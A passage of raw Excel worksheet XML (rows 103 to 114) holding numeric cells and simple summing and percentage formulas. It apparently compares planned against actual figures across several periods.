      <c r="C103" s="25"/>
      <c r="D103" s="104"/>
      <c r="E103" s="83"/>
      <c r="F103" s="104"/>
      <c r="G103" s="104"/>
      <c r="H103" s="104"/>
      <c r="I103" s="104"/>
      <c r="J103" s="104"/>
      <c r="K103" s="104"/>
      <c r="L103" s="104"/>
      <c r="M103" s="105"/>
      <c r="N103" s="196">
        <f>P103+T103+X103+AB103+AF103+AI103+AL103</f>
        <v>20</v>
      </c>
      <c r="O103" s="86">
        <f>AM103+AJ103+AG103+AD103+Z103+R103+V103</f>
        <v>20.23</v>
      </c>
      <c r="P103" s="40">
        <v>3</v>
      </c>
      <c r="Q103" s="41"/>
      <c r="R103" s="106">
        <v>3</v>
      </c>
      <c r="S103" s="39"/>
      <c r="T103" s="40">
        <v>3</v>
      </c>
      <c r="U103" s="41"/>
      <c r="V103" s="106">
        <v>3</v>
      </c>
      <c r="W103" s="39"/>
      <c r="X103" s="40">
        <v>4</v>
      </c>
      <c r="Y103" s="41"/>
      <c r="Z103" s="106">
        <v>4</v>
      </c>
      <c r="AA103" s="39"/>
      <c r="AB103" s="40">
        <v>4</v>
      </c>
      <c r="AC103" s="41"/>
      <c r="AD103" s="106">
        <v>4.2</v>
      </c>
      <c r="AE103" s="39"/>
      <c r="AF103" s="40">
        <v>2</v>
      </c>
      <c r="AG103" s="106">
        <v>2.0299999999999998</v>
      </c>
      <c r="AH103" s="39"/>
      <c r="AI103" s="40">
        <v>2</v>
      </c>
      <c r="AJ103" s="106">
        <v>2</v>
      </c>
      <c r="AK103" s="39"/>
      <c r="AL103" s="40">
        <v>2</v>
      </c>
      <c r="AM103" s="106">
        <v>2</v>
      </c>
      <c r="AN103" s="106"/>
      <c r="AO103" s="73">
        <f>O103/N103*100</f>
        <v>101.15</v>
      </c>
      <c r="AP103" s="74">
        <f t="shared" si="204"/>
        <v>20.23</v>
      </c>
      <c r="AQ103" s="107"/>
    </row>
    <row r="104" spans="1:43" ht="22.5" customHeight="1">
      <c r="A104" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B104" s="44" t="s">
        <v>151</v>
      </c>
      <c r="C104" s="25"/>
      <c r="D104" s="104"/>
      <c r="E104" s="83"/>
      <c r="F104" s="104"/>
      <c r="G104" s="104"/>
      <c r="H104" s="104"/>
      <c r="I104" s="104"/>
      <c r="J104" s="104"/>
      <c r="K104" s="104"/>
      <c r="L104" s="104"/>
      <c r="M104" s="105"/>
      <c r="N104" s="196">
        <f>P104+T104+X104+AB104+AF104+AI104+AL104</f>
        <v>70</v>
      </c>
      <c r="O104" s="86">
        <f>AM104+AJ104+AG104+AD104+Z104+R104+V104</f>
        <v>34.020000000000003</v>
      </c>
      <c r="P104" s="40">
        <v>0</v>
      </c>
      <c r="Q104" s="41"/>
      <c r="R104" s="106"/>
      <c r="S104" s="39"/>
      <c r="T104" s="40">
        <v>12</v>
      </c>
      <c r="U104" s="41"/>
      <c r="V104" s="106">
        <v>2</v>
      </c>
      <c r="W104" s="39"/>
      <c r="X104" s="40">
        <v>10</v>
      </c>
      <c r="Y104" s="41"/>
      <c r="Z104" s="106"/>
      <c r="AA104" s="39"/>
      <c r="AB104" s="40">
        <v>15</v>
      </c>
      <c r="AC104" s="41"/>
      <c r="AD104" s="106">
        <v>4.0999999999999996</v>
      </c>
      <c r="AE104" s="39"/>
      <c r="AF104" s="40">
        <v>15</v>
      </c>
      <c r="AG104" s="106">
        <v>8</v>
      </c>
      <c r="AH104" s="39"/>
      <c r="AI104" s="40">
        <v>10</v>
      </c>
      <c r="AJ104" s="106">
        <v>11.6</v>
      </c>
      <c r="AK104" s="39"/>
      <c r="AL104" s="40">
        <v>8</v>
      </c>
      <c r="AM104" s="106">
        <v>8.32</v>
      </c>
      <c r="AN104" s="106"/>
      <c r="AO104" s="73">
        <f>O104/N104*100</f>
        <v>48.6</v>
      </c>
      <c r="AP104" s="74">
        <f t="shared" si="204"/>
        <v>34.020000000000003</v>
      </c>
      <c r="AQ104" s="107"/>
    </row>
    <row r="105" spans="1:43" ht="22.5" customHeight="1">
      <c r="A105" s="43" t="s">
        <v>148</v>
      </c>
      <c r="B105" s="44" t="s">
        <v>152</v>
      </c>
      <c r="C105" s="25"/>
      <c r="D105" s="104"/>
      <c r="E105" s="83"/>
      <c r="F105" s="104"/>
      <c r="G105" s="104"/>
      <c r="H105" s="104"/>
      <c r="I105" s="104"/>
      <c r="J105" s="104"/>
      <c r="K105" s="104"/>
      <c r="L105" s="104"/>
      <c r="M105" s="105"/>
      <c r="N105" s="196">
        <f>P105+T105+X105+AB105+AF105+AI105+AL105</f>
        <v>30</v>
      </c>
      <c r="O105" s="86">
        <f>AM105+AJ105+AG105+AD105+Z105+R105+V105</f>
        <v>31.73</v>
      </c>
      <c r="P105" s="40">
        <v>4</v>
      </c>
      <c r="Q105" s="41"/>
      <c r="R105" s="106">
        <v>4</v>
      </c>
      <c r="S105" s="39"/>
      <c r="T105" s="40">
        <v>4</v>
      </c>
      <c r="U105" s="41"/>
      <c r="V105" s="106">
        <v>4</v>
      </c>
      <c r="W105" s="39"/>
      <c r="X105" s="40">
        <v>4</v>
      </c>
      <c r="Y105" s="41"/>
      <c r="Z105" s="106">
        <v>4</v>
      </c>
      <c r="AA105" s="39"/>
      <c r="AB105" s="40">
        <v>6</v>
      </c>
      <c r="AC105" s="41"/>
      <c r="AD105" s="106">
        <v>7.63</v>
      </c>
      <c r="AE105" s="39"/>
      <c r="AF105" s="40">
        <v>4</v>
      </c>
      <c r="AG105" s="106">
        <v>4</v>
      </c>
      <c r="AH105" s="39"/>
      <c r="AI105" s="40">
        <v>3</v>
      </c>
      <c r="AJ105" s="106">
        <v>3</v>
      </c>
      <c r="AK105" s="39"/>
      <c r="AL105" s="40">
        <v>5</v>
      </c>
      <c r="AM105" s="106">
        <v>5.0999999999999996</v>
      </c>
      <c r="AN105" s="106"/>
      <c r="AO105" s="73">
        <f>O105/N105*100</f>
        <v>105.76666666666668</v>
      </c>
      <c r="AP105" s="74">
        <f t="shared" si="204"/>
        <v>31.73</v>
      </c>
      <c r="AQ105" s="107"/>
    </row>
    <row r="106" spans="1:43" s="197" customFormat="1" ht="22.5" customHeight="1">
      <c r="A106" s="92">
        <v>5</v>
      </c>
      <c r="B106" s="93" t="s">
        <v>97</v>
      </c>
      <c r="C106" s="115" t="s">
        <v>1</v>
      </c>
      <c r="D106" s="110">
        <v>353.6</v>
      </c>
      <c r="E106" s="71">
        <f>E107+E108</f>
        <v>444.64</v>
      </c>
      <c r="F106" s="110">
        <f>F107+F108</f>
        <v>20.3</v>
      </c>
      <c r="G106" s="110">
        <f t="shared" ref="G106:L106" si="205">G107+G108</f>
        <v>119.75</v>
      </c>
      <c r="H106" s="110">
        <f t="shared" si="205"/>
        <v>125.5</v>
      </c>
      <c r="I106" s="110">
        <f t="shared" si="205"/>
        <v>42.8</v>
      </c>
      <c r="J106" s="110">
        <f t="shared" si="205"/>
        <v>41.769999999999996</v>
      </c>
      <c r="K106" s="110">
        <f t="shared" si="205"/>
        <v>33.51</v>
      </c>
      <c r="L106" s="110">
        <f t="shared" si="205"/>
        <v>65.12</v>
      </c>
      <c r="M106" s="111">
        <f>M107+M108</f>
        <v>448.75</v>
      </c>
      <c r="N106" s="198">
        <f t="shared" ref="N106:T106" si="206">N107+N108</f>
        <v>518.75</v>
      </c>
      <c r="O106" s="73">
        <f t="shared" si="206"/>
        <v>535.29</v>
      </c>
      <c r="P106" s="73">
        <f t="shared" si="206"/>
        <v>30.3</v>
      </c>
      <c r="Q106" s="73">
        <v>20.3</v>
      </c>
      <c r="R106" s="112">
        <f t="shared" si="206"/>
        <v>30.3</v>
      </c>
      <c r="S106" s="112"/>
      <c r="T106" s="73">
        <f t="shared" si="206"/>
        <v>139.75</v>
      </c>
      <c r="U106" s="73">
        <v>119.75</v>
      </c>
      <c r="V106" s="112">
        <f t="shared" ref="V106" si="207">V107+V108</f>
        <v>143.85</v>
      </c>
      <c r="W106" s="112"/>
      <c r="X106" s="73">
        <f>X107+X108</f>
        <v>133.5</v>
      </c>
      <c r="Y106" s="73">
        <v>125.5</v>
      </c>
      <c r="Z106" s="112">
        <f t="shared" ref="Z106" si="208">Z107+Z108</f>
        <v>133.6</v>
      </c>
      <c r="AA106" s="112"/>
      <c r="AB106" s="73">
        <f>AB107+AB108</f>
        <v>52.8</v>
      </c>
      <c r="AC106" s="73"/>
      <c r="AD106" s="112">
        <f t="shared" ref="AD106" si="209">AD107+AD108</f>
        <v>53.62</v>
      </c>
      <c r="AE106" s="112"/>
      <c r="AF106" s="73">
        <f>AF107+AF108</f>
        <v>48.769999999999996</v>
      </c>
      <c r="AG106" s="112">
        <f t="shared" ref="AG106" si="210">AG107+AG108</f>
        <v>48.769999999999996</v>
      </c>
      <c r="AH106" s="112">
        <f>AG106-J106</f>
        <v>7</v>
      </c>
      <c r="AI106" s="73">
        <f>AI107+AI108</f>
        <v>38.510000000000005</v>
      </c>
      <c r="AJ106" s="112">
        <f t="shared" ref="AJ106" si="211">AJ107+AJ108</f>
        <v>40.460000000000008</v>
      </c>
      <c r="AK106" s="112">
        <f>AJ106-K106</f>
        <v>6.9500000000000099</v>
      </c>
      <c r="AL106" s="73">
        <f>AL107+AL108</f>
        <v>75.12</v>
      </c>
      <c r="AM106" s="112">
        <f t="shared" ref="AM106" si="212">AM107+AM108</f>
        <v>84.69</v>
      </c>
      <c r="AN106" s="112">
        <f>AM106-L106</f>
        <v>19.569999999999993</v>
      </c>
      <c r="AO106" s="73">
        <f>O106/N106*100</f>
        <v>103.18843373493975</v>
      </c>
      <c r="AP106" s="74">
        <f t="shared" si="204"/>
        <v>86.539999999999964</v>
      </c>
      <c r="AQ106" s="113"/>
    </row>
    <row r="107" spans="1:43" ht="22.5" customHeight="1">
      <c r="A107" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B107" s="81" t="s">
        <v>103</v>
      </c>
      <c r="C107" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D107" s="104">
        <v>273</v>
      </c>
      <c r="E107" s="71">
        <v>353.64</v>
      </c>
      <c r="F107" s="126">
        <f>2+5.8</f>
        <v>7.8</v>
      </c>
      <c r="G107" s="126">
        <f>93.4+12.05</f>
        <v>105.45</v>
      </c>
      <c r="H107" s="126">
        <f>103+8</f>
        <v>111</v>
      </c>
      <c r="I107" s="126">
        <v>27.8</v>
      </c>
      <c r="J107" s="126">
        <v>26.57</v>
      </c>
      <c r="K107" s="126">
        <f>15.5+7.2</f>
        <v>22.7</v>
      </c>
      <c r="L107" s="126">
        <f>29.02+23.3</f>
        <v>52.32</v>
      </c>
      <c r="M107" s="127">
        <v>353.64</v>
      </c>
      <c r="N107" s="196">
        <f>P107+T107+X107+AB107+AF107+AI107+AL107</f>
        <v>448.75</v>
      </c>
      <c r="O107" s="73">
        <f>R107+V107+Z107+AD107+AG107+AJ107+AM107</f>
        <v>448.75</v>
      </c>
      <c r="P107" s="38">
        <f>2+5.8+12.5</f>
        <v>20.3</v>
      </c>
      <c r="Q107" s="38">
        <v>7.8</v>
      </c>
      <c r="R107" s="38">
        <f>P107</f>
        <v>20.3</v>
      </c>
      <c r="S107" s="38"/>
      <c r="T107" s="38">
        <f>93.4+12.05+14.3</f>
        <v>119.75</v>
      </c>
      <c r="U107" s="38">
        <v>105.45</v>
      </c>
      <c r="V107" s="38">
        <f>T107</f>
        <v>119.75</v>
      </c>
      <c r="W107" s="38"/>
      <c r="X107" s="38">
        <f>103+8+14.5</f>
        <v>125.5</v>
      </c>
      <c r="Y107" s="38">
        <v>111</v>
      </c>
      <c r="Z107" s="38">
        <f>X107</f>
        <v>125.5</v>
      </c>
      <c r="AA107" s="38"/>
      <c r="AB107" s="38">
        <f>27.8+15</f>
        <v>42.8</v>
      </c>
      <c r="AC107" s="38"/>
      <c r="AD107" s="38">
        <f>AB107</f>
        <v>42.8</v>
      </c>
      <c r="AE107" s="38"/>
      <c r="AF107" s="38">
        <f>26.57+15.2</f>
        <v>41.769999999999996</v>
      </c>
      <c r="AG107" s="38">
        <f>AF107</f>
        <v>41.769999999999996</v>
      </c>
      <c r="AH107" s="38"/>
      <c r="AI107" s="38">
        <f>15.51+7.2+10.8</f>
        <v>33.510000000000005</v>
      </c>
      <c r="AJ107" s="38">
        <f>AI107</f>
        <v>33.510000000000005</v>
      </c>
      <c r="AK107" s="38"/>
      <c r="AL107" s="38">
        <f>29.02+23.3+12.8</f>
        <v>65.12</v>
      </c>
      <c r="AM107" s="38">
        <f>AL107</f>
        <v>65.12</v>
      </c>
      <c r="AN107" s="39"/>
      <c r="AO107" s="73"/>
      <c r="AP107" s="74">
        <f t="shared" si="204"/>
        <v>95.110000000000014</v>
      </c>
      <c r="AQ107" s="128"/>
    </row>
    <row r="108" spans="1:43" ht="22.5" customHeight="1">
      <c r="A108" s="76" t="s">
        <v>3</v>
      </c>
      <c r="B108" s="81" t="s">
        <v>129</v>
      </c>
      <c r="C108" s="25"/>
      <c r="D108" s="104">
        <v>80.400000000000006</v>
      </c>
      <c r="E108" s="83">
        <f>E109</f>
        <v>91</v>
      </c>
      <c r="F108" s="104">
        <f>F109+F110</f>
        <v>12.5</v>
      </c>
      <c r="G108" s="104">
        <f>G109+G110</f>
        <v>14.3</v>
      </c>
      <c r="H108" s="104">
        <f t="shared" ref="H108:L108" si="213">H109+H110</f>
        <v>14.5</v>
      </c>
      <c r="I108" s="104">
        <f t="shared" si="213"/>
        <v>15</v>
      </c>
      <c r="J108" s="104">
        <f t="shared" si="213"/>
        <v>15.2</v>
      </c>
      <c r="K108" s="104">
        <f t="shared" si="213"/>
        <v>10.81</v>
      </c>
      <c r="L108" s="104">
        <f t="shared" si="213"/>
        <v>12.8</v>
      </c>
      <c r="M108" s="129">
        <v>95.11</v>
      </c>
      <c r="N108" s="196">
        <f>P108+T108+X108+AB108+AF108+AI108+AL108</f>
        <v>70</v>
      </c>
      <c r="O108" s="86">
        <f>R108+V108+Z108+AD108+AG108+AJ108+AM108</f>
        <v>86.539999999999992</v>
      </c>
      <c r="P108" s="86">
        <v>10</v>
      </c>
      <c r="Q108" s="86">
        <v>12.5</v>
      </c>
      <c r="R108" s="87">
        <v>10</v>
      </c>
      <c r="S108" s="87"/>
      <c r="T108" s="86">
        <v>20</v>
      </c>
      <c r="U108" s="86">
        <v>14.3</v>
      </c>
      <c r="V108" s="87">
        <v>24.1</v>
      </c>
      <c r="W108" s="87"/>
      <c r="X108" s="86">
        <v>8</v>
      </c>
      <c r="Y108" s="86">
        <v>14.5</v>
      </c>
      <c r="Z108" s="87">
        <v>8.1</v>
      </c>
      <c r="AA108" s="87"/>
      <c r="AB108" s="86">
        <v>10</v>
      </c>
      <c r="AC108" s="86"/>
      <c r="AD108" s="87">
        <v>10.82</v>
      </c>
      <c r="AE108" s="87"/>
      <c r="AF108" s="86">
        <v>7</v>
      </c>
      <c r="AG108" s="87">
        <v>7</v>
      </c>
      <c r="AH108" s="87"/>
      <c r="AI108" s="86">
        <v>5</v>
      </c>
      <c r="AJ108" s="87">
        <v>6.95</v>
      </c>
      <c r="AK108" s="87"/>
      <c r="AL108" s="86">
        <v>10</v>
      </c>
      <c r="AM108" s="87">
        <v>19.57</v>
      </c>
      <c r="AN108" s="87"/>
      <c r="AO108" s="86">
        <f>O108/N108*100</f>
        <v>123.62857142857142</v>
      </c>
      <c r="AP108" s="130">
        <f t="shared" si="204"/>
        <v>-8.5700000000000074</v>
      </c>
      <c r="AQ108" s="120"/>
    </row>
    <row r="109" spans="1:43" s="195" customFormat="1" ht="22.5" hidden="1" customHeight="1">
      <c r="A109" s="131" t="s">
        <v>115</v>
      </c>
      <c r="B109" s="101" t="s">
        <v>105</v>
      </c>
      <c r="C109" s="103" t="s">
        <v>1</v>
      </c>
      <c r="D109" s="104">
        <v>80.400000000000006</v>
      </c>
      <c r="E109" s="71">
        <v>91</v>
      </c>
      <c r="F109" s="104">
        <v>12.5</v>
      </c>
      <c r="G109" s="104">
        <v>14.3</v>
      </c>
      <c r="H109" s="104">
        <v>14.5</v>
      </c>
      <c r="I109" s="104">
        <v>15</v>
      </c>
      <c r="J109" s="104">
        <v>15.2</v>
      </c>
      <c r="K109" s="104">
        <v>10.81</v>
      </c>
      <c r="L109" s="104">
        <v>12.8</v>
      </c>
      <c r="M109" s="129">
        <v>353.64</v>
      </c>
      <c r="N109" s="196"/>
      <c r="O109" s="73">
        <f>R109+V109+Z109+AD109+AG109+AJ109+AM109</f>
        <v>0</v>
      </c>
      <c r="P109" s="73"/>
      <c r="Q109" s="73">
        <v>12.5</v>
      </c>
      <c r="R109" s="106"/>
      <c r="S109" s="106"/>
      <c r="T109" s="106"/>
      <c r="U109" s="106">
        <v>14.3</v>
      </c>
      <c r="V109" s="106"/>
      <c r="W109" s="106"/>
      <c r="X109" s="106"/>
      <c r="Y109" s="106">
        <v>14.5</v>
      </c>
      <c r="Z109" s="106"/>
      <c r="AA109" s="106"/>
      <c r="AB109" s="106"/>
      <c r="AC109" s="106"/>
      <c r="AD109" s="106"/>
      <c r="AE109" s="106"/>
      <c r="AF109" s="106"/>
      <c r="AG109" s="106"/>
      <c r="AH109" s="106"/>
      <c r="AI109" s="106"/>
      <c r="AJ109" s="106"/>
      <c r="AK109" s="106"/>
      <c r="AL109" s="106"/>
      <c r="AM109" s="106"/>
      <c r="AN109" s="106"/>
      <c r="AO109" s="106"/>
      <c r="AP109" s="74">
        <f t="shared" si="204"/>
        <v>-353.64</v>
      </c>
      <c r="AQ109" s="107"/>
    </row>
    <row r="110" spans="1:43" s="195" customFormat="1" ht="22.5" hidden="1" customHeight="1">
      <c r="A110" s="131" t="s">
        <v>115</v>
      </c>
      <c r="B110" s="101" t="s">
        <v>106</v>
      </c>
      <c r="C110" s="103" t="s">
        <v>1</v>
      </c>
      <c r="D110" s="104">
        <v>0</v>
      </c>
      <c r="E110" s="71"/>
      <c r="F110" s="104">
        <v>0</v>
      </c>
      <c r="G110" s="104">
        <v>0</v>
      </c>
      <c r="H110" s="104">
        <v>0</v>
      </c>
      <c r="I110" s="104">
        <v>0</v>
      </c>
      <c r="J110" s="104">
        <v>0</v>
      </c>
      <c r="K110" s="104">
        <v>0</v>
      </c>
      <c r="L110" s="104">
        <v>0</v>
      </c>
      <c r="M110" s="129">
        <v>95.11</v>
      </c>
      <c r="N110" s="196"/>
      <c r="O110" s="73">
        <f>R110+V110+Z110+AD110+AG110+AJ110+AM110</f>
        <v>0</v>
      </c>
      <c r="P110" s="73"/>
      <c r="Q110" s="73">
        <v>0</v>
      </c>
      <c r="R110" s="106"/>
      <c r="S110" s="106"/>
      <c r="T110" s="106"/>
      <c r="U110" s="106">
        <v>0</v>
      </c>
      <c r="V110" s="106"/>
      <c r="W110" s="106"/>
      <c r="X110" s="106"/>
      <c r="Y110" s="106">
        <v>0</v>
      </c>
      <c r="Z110" s="106"/>
      <c r="AA110" s="106"/>
      <c r="AB110" s="106"/>
      <c r="AC110" s="106"/>
      <c r="AD110" s="106"/>
      <c r="AE110" s="106"/>
      <c r="AF110" s="106"/>
      <c r="AG110" s="106"/>
      <c r="AH110" s="106"/>
      <c r="AI110" s="106"/>
      <c r="AJ110" s="106"/>
      <c r="AK110" s="106"/>
      <c r="AL110" s="106"/>
      <c r="AM110" s="106"/>
      <c r="AN110" s="106"/>
      <c r="AO110" s="106"/>
      <c r="AP110" s="74">
        <f t="shared" si="204"/>
        <v>-95.11</v>
      </c>
      <c r="AQ110" s="107"/>
    </row>
    <row r="111" spans="1:43" ht="22.5" customHeight="1">
      <c r="A111" s="76" t="s">
        <v>96</v>
      </c>
      <c r="B111" s="24" t="s">
        <v>75</v>
      </c>
      <c r="C111" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D111" s="110">
        <v>3143</v>
      </c>
      <c r="E111" s="71">
        <f>E112+E113</f>
        <v>3294.87</v>
      </c>
      <c r="F111" s="110">
        <f t="shared" ref="F111:L111" si="214">F112+F113</f>
        <v>630.1</v>
      </c>
      <c r="G111" s="110">
        <f t="shared" si="214"/>
        <v>283.70000000000005</v>
      </c>
      <c r="H111" s="110">
        <f t="shared" si="214"/>
        <v>472.48</v>
      </c>
      <c r="I111" s="110">
        <f t="shared" si="214"/>
        <v>450.02000000000004</v>
      </c>
      <c r="J111" s="110">
        <f t="shared" si="214"/>
        <v>390.64</v>
      </c>
      <c r="K111" s="110">
        <f t="shared" si="214"/>
        <v>474.70000000000005</v>
      </c>
      <c r="L111" s="110">
        <f t="shared" si="214"/>
        <v>335</v>
      </c>
      <c r="M111" s="111">
        <v>95.11</v>
      </c>
      <c r="N111" s="198">
        <f>N112+N113</f>
        <v>3367.1200000000003</v>
      </c>
      <c r="O111" s="73">
        <f>O112+O113</f>
        <v>3242.57</v>
      </c>
      <c r="P111" s="73"/>
      <c r="Q111" s="73">
        <v>630.1</v>
      </c>
      <c r="R111" s="112">
        <f t="shared" ref="R111" si="215">R112+R113</f>
        <v>692.85</v>
      </c>
      <c r="S111" s="112"/>
      <c r="T111" s="73"/>
      <c r="U111" s="73">
        <v>283.70000000000005</v>
      </c>
      <c r="V111" s="112">
        <f t="shared" ref="V111" si="216">V112+V113</f>
        <v>276.59000000000003</v>
      </c>
      <c r="W111" s="112"/>
      <c r="X111" s="73"/>
      <c r="Y111" s="73">
        <v>472.48</v>
      </c>
      <c r="Z111" s="112">
        <f t="shared" ref="Z111" si="217">Z112+Z113</f>
        <v>474.38000000000005</v>
      </c>
      <c r="AA111" s="112"/>
      <c r="AB111" s="73"/>
      <c r="AC111" s="73"/>
      <c r="AD111" s="112">
        <f t="shared" ref="AD111" si="218">AD112+AD113</f>
        <v>422.46000000000004</v>
      </c>
      <c r="AE111" s="112"/>
      <c r="AF111" s="73"/>
      <c r="AG111" s="112">
        <f t="shared" ref="AG111" si="219">AG112+AG113</f>
        <v>417.37</v>
      </c>
      <c r="AH111" s="112"/>
      <c r="AI111" s="73"/>
      <c r="AJ111" s="112">
        <f t="shared" ref="AJ111" si="220">AJ112+AJ113</f>
        <v>451.58000000000004</v>
      </c>
      <c r="AK111" s="112"/>
      <c r="AL111" s="73"/>
      <c r="AM111" s="112">
        <f t="shared" ref="AM111" si="221">AM112+AM113</f>
        <v>316.86</v>
      </c>
      <c r="AN111" s="112"/>
      <c r="AO111" s="73">
        <f t="shared" ref="AO111:AO136" si="222">O111/N111*100</f>
        <v>96.300993133597842</v>
      </c>
      <c r="AP111" s="74">
        <f t="shared" si="204"/>
        <v>3147.46</v>
      </c>
      <c r="AQ111" s="113"/>
    </row>
    <row r="112" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A112" s="76">
        <v>1</v>
      </c>
      <c r="B112" s="24" t="s">
        <v>24</v>
      </c>
      <c r="C112" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D112" s="70">
        <v>1899</v>
      </c>
      <c r="E112" s="71">
        <v>1720</v>
      </c>
      <c r="F112" s="70">
        <v>471</v>
      </c>
      <c r="G112" s="70">
        <v>150</v>
      </c>
      <c r="H112" s="70">
        <f>152-10.37-1.2</f>
        <v>140.43</v>
      </c>
      <c r="I112" s="70">
        <f>225-27.5</f>
        <v>197.5</v>
      </c>
      <c r="J112" s="70">
        <f>252-29</f>
        <v>223</v>
      </c>
      <c r="K112" s="70">
        <v>239</v>
      </c>
      <c r="L112" s="70">
        <f>226</f>
        <v>226</v>
      </c>
      <c r="M112" s="124">
        <v>1646.93</v>
      </c>
      <c r="N112" s="118">
        <f>P112+T112+X112+AB112+AF112+AI112+AL112</f>
        <v>1546.93</v>
      </c>
      <c r="O112" s="73">
        <f>R112+V112+Z112+AD112+AG112+AJ112+AM112</f>
        <v>1406.4699999999998</v>
      </c>
      <c r="P112" s="34">
        <f>471-14</f>
        <v>457</v>
      </c>
      <c r="Q112" s="35">
        <v>471</v>
      </c>
      <c r="R112" s="79">
        <f>471-10-3-3-2.3+4.6</f>
        <v>457.3</v>
      </c>
      <c r="S112" s="33">
        <f>R112-Q112</f>
        <v>-13.699999999999989</v>
      </c>
      <c r="T112" s="34">
        <f>150-24</f>
        <v>126</v>
      </c>
      <c r="U112" s="35">
        <v>150</v>
      </c>
      <c r="V112" s="79">
        <v>114.65</v>
      </c>
      <c r="W112" s="33">
        <f>V112-U112</f>
        <v>-35.349999999999994</v>
      </c>
      <c r="X112" s="34">
        <f>140.43-12</f>
        <v>128.43</v>
      </c>
      <c r="Y112" s="35">
        <v>140.43</v>
      </c>
      <c r="Z112" s="79">
        <v>111.73</v>
      </c>
      <c r="AA112" s="33">
        <f>Z112-Y112</f>
        <v>-28.700000000000003</v>
      </c>
      <c r="AB112" s="34">
        <f>197.5-16</f>
        <v>181.5</v>
      </c>
      <c r="AC112" s="35"/>
      <c r="AD112" s="79">
        <v>134.81</v>
      </c>
      <c r="AE112" s="33">
        <f>AD112-I112</f>
        <v>-62.69</v>
      </c>
      <c r="AF112" s="34">
        <f>223-11</f>
        <v>212</v>
      </c>
      <c r="AG112" s="79">
        <v>206.13</v>
      </c>
      <c r="AH112" s="33">
        <f>AG112-J112</f>
        <v>-16.870000000000005</v>
      </c>
      <c r="AI112" s="34">
        <f>239-8</f>
        <v>231</v>
      </c>
      <c r="AJ112" s="79">
        <v>199.05</v>
      </c>
      <c r="AK112" s="33">
        <f>AJ112-K112</f>
        <v>-39.949999999999989</v>
      </c>
      <c r="AL112" s="34">
        <f>226-15</f>
        <v>211</v>
      </c>
      <c r="AM112" s="79">
        <f>211-10-4.62-13.58</f>
        <v>182.79999999999998</v>
      </c>
      <c r="AN112" s="73">
        <f>AM112-L112</f>
        <v>-43.200000000000017</v>
      </c>
      <c r="AO112" s="73">
        <f t="shared" si="222"/>
        <v>90.920080417342717</v>
      </c>
      <c r="AP112" s="74">
        <f t="shared" si="204"/>
        <v>-240.46000000000026</v>
      </c>
      <c r="AQ112" s="80"/>
    </row>
    <row r="113" spans="1:43" ht="22.5" customHeight="1">
      <c r="A113" s="76">
        <v>2</v>
      </c>
      <c r="B113" s="24" t="s">
        <v>107</v>
      </c>
      <c r="C113" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D113" s="70">
        <v>1244</v>
      </c>
      <c r="E113" s="71">
        <f>E114+E118</f>
        <v>1574.8700000000001</v>
      </c>
      <c r="F113" s="70">
        <f t="shared" ref="F113:L113" si="223">F114+F118</f>
        <v>159.1</v>
      </c>
      <c r="G113" s="70">
        <f t="shared" si="223"/>
        <v>133.70000000000002</v>
      </c>
      <c r="H113" s="70">
        <f t="shared" si="223"/>
        <v>332.05</v>
      </c>
      <c r="I113" s="70">
        <f t="shared" si="223"/>
        <v>252.52000000000004</v>
      </c>
      <c r="J113" s="70">
        <f t="shared" si="223"/>
        <v>167.64</v>
      </c>
      <c r="K113" s="70">
        <f t="shared" si="223"/>
        <v>235.70000000000002</v>
      </c>
      <c r="L113" s="70">
        <f t="shared" si="223"/>
        <v>109.00000000000001</v>
      </c>
      <c r="M113" s="124">
        <f>M114+M118</f>
        <v>1580.19</v>
      </c>
      <c r="N113" s="78">
        <f>N114+N118</f>
        <v>1820.1900000000003</v>
      </c>
      <c r="O113" s="73">
        <f>O114+O118</f>
        <v>1836.1000000000004</v>
      </c>
      <c r="P113" s="73"/>
      <c r="Q113" s="73">
        <v>159.1</v>
      </c>
      <c r="R113" s="79">
        <f t="shared" ref="R113" si="224">R114+R118</f>
        <v>235.55</v>
      </c>
      <c r="S113" s="79"/>
      <c r="T113" s="73"/>
      <c r="U113" s="73">
        <v>133.70000000000002</v>
      </c>
      <c r="V113" s="79">
        <f t="shared" ref="V113" si="225">V114+V118</f>
        <v>161.94000000000003</v>
      </c>
      <c r="W113" s="79"/>
      <c r="X113" s="73"/>
      <c r="Y113" s="73">
        <v>332.05</v>
      </c>
      <c r="Z113" s="79">
        <f t="shared" ref="Z113" si="226">Z114+Z118</f>
        <v>362.65000000000003</v>
      </c>
      <c r="AA113" s="79"/>
      <c r="AB113" s="73"/>
      <c r="AC113" s="73"/>
      <c r="AD113" s="79">
        <f t="shared" ref="AD113" si="227">AD114+AD118</f>
        <v>287.65000000000003</v>
      </c>
      <c r="AE113" s="79">
        <f>AE13+AE112</f>
        <v>-25.400000000000034</v>
      </c>
      <c r="AF113" s="73"/>
      <c r="AG113" s="79">
        <f t="shared" ref="AG113" si="228">AG114+AG118</f>
        <v>211.23999999999998</v>
      </c>
      <c r="AH113" s="79"/>
      <c r="AI113" s="73"/>
      <c r="AJ113" s="79">
        <f t="shared" ref="AJ113" si="229">AJ114+AJ118</f>
        <v>252.53000000000003</v>
      </c>
      <c r="AK113" s="79"/>
      <c r="AL113" s="73"/>
      <c r="AM113" s="79">
        <f t="shared" ref="AM113" si="230">AM114+AM118</f>
        <v>134.06</v>
      </c>
      <c r="AN113" s="79"/>
      <c r="AO113" s="73">
        <f t="shared" si="222"/>
        <v>100.87408457358849</v>
      </c>
      <c r="AP113" s="74">
        <f t="shared" si="204"/>
        <v>255.91000000000031</v>
      </c>
      <c r="AQ113" s="80"/>
    </row>
    <row r="114" spans="1:43" ht="22.5" customHeight="1">
      <c r="A114" s="76" t="s">
        <v>33</v>
      </c>
      <c r="B114" s="24" t="s">
        <v>104</v>
      </c>
      <c r="C114" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D114" s="70">
        <v>807</v>
      </c>
      <c r="E114" s="83">
        <f>E115+E116+E117</f>
        <v>1243.8700000000001</v>
      </c>
      <c r="F114" s="70">
        <f>F115+F116+F117</f>
        <v>126.3</v>
      </c>
      <c r="G114" s="70">
        <f t="shared" ref="G114:L114" si="231">G115+G116+G117</f>
        <v>109.52000000000001</v>
      </c>
      <c r="H114" s="70">
        <f t="shared" si="231"/>
        <v>272.45</v>
      </c>
